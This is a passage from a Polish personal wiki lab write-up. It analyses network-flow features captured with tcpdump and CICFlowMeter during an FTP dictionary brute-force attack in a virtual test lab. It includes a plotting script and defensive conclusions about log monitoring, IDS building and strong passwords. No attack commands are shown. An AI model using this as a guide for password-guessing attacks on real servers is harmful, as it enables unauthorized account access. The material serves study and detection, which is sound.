  * ''flow_duration'' (~103 s) – sesja trwała ponad 1,5 minuty; w przypadku automatycznego ataku można się tego spodziewać, gdy serwer zwalnia odpowiedzi.
  * ''tot_fwd_pkts'' = 10, ''tot_bwd_pkts'' = 7 – 10 prób logowania z serwera (komunikaty żądania), 7 odpowiedzi serwera (błędy logowania).
  * ''flow_byts_s'' ≈ 12 B/s – to stosunkowo niska przepustowość, typowa dla sesji inicjowanych ręcznie lub przy wolnym ftp.
  * ''flow_pkts_s'' ≈ 0.165 pkt/s – bardzo rzadkie pakiety (średnio co 6 sekund), co może sugerować rate-limit lub timeout serwera.
  * ''flow_iat_mean'' ≈ 16 s – średnia odległość czasowa między pakietami to 16 s, co wskazuje na powolną interakcję między próbami.

===== Uproszczona sygnatura ataku =====

Poniżej prosty skrypt wizualizujący dane wyjściowe z programu CICFlowMeter:\\
<code python signature_grapher.py>
import pandas as pd
import matplotlib.pyplot as plt

# Wczytanie danych z pliku CSV
df = pd.read_csv('ftp_attack.csv')

# Wybór interesujących cech
features = ['flow_duration', 'flow_byts_s', 'flow_pkts_s', 'fwd_pkts_s', 'bwd_pkts_s',
            'tot_fwd_pkts', 'tot_bwd_pkts', 'totlen_fwd_pkts', 'totlen_bwd_pkts',
            'fwd_pkt_len_max', 'bwd_pkt_len_max', 'flow_iat_mean', 'flow_iat_std',
            'flow_iat_max', 'flow_iat_min']
df_selected = df[features]

# Normalizacja danych (opcjonalnie)
df_normalized = (df_selected - df_selected.mean()) / df_selected.std()

# Wizualizacja
plt.figure(figsize=(12, 8))
for feature in df_normalized.columns:
    plt.plot(df_normalized.index, df_normalized[feature], label=feature)
plt.title('Sygnatura Ataku')
plt.xlabel('Indeks Przepływu')
plt.ylabel('Znormalizowana Wartość')
plt.legend()
plt.grid(True)
plt.show()
</code>

{{.:pasted:20250619-194744.png}}

====== Wnioski ======

  * Skuteczność ataku brute-force zależy od słownika – jeśli hasło użytkownika nie jest w słowniku, atak się nie powiedzie, choć nadal generuje duży ruch i może zostać wykryty.
  * Monitorowanie logów serwera FTP jest kluczowe – logi wyraźnie pokazują wielokrotne, nieudane próby logowania, co pozwala administratorowi wykryć próbę ataku.
  * Przechwytywanie i analiza ruchu (tcpdump + CICFlowMeter) – umożliwiają szczegółową analizę zachowania sieci podczas ataku, co może być wykorzystane do budowy systemów wykrywania włamań (IDS).
  * Ograniczenie szybkości ataku (--rate-limit=50) – jest istotne, aby nie przeciążyć serwera i lepiej symulować realistyczne warunki ataku.
  * Silne, losowe hasło zabezpiecza konto – stosowanie silnych haseł, które nie występują w popularnych słownikach, jest podstawową ochroną przed atakami brute-force.
  * Środowisko testowe oparte na VM i Hyper-V – pozwala na bezpieczne i kontrolowane przeprowadzanie eksperymentów bezpieczeństwa.
Kacper's Wiki

Narzędzia użytkownika

Narzędzia witryny

Narzędzia strony
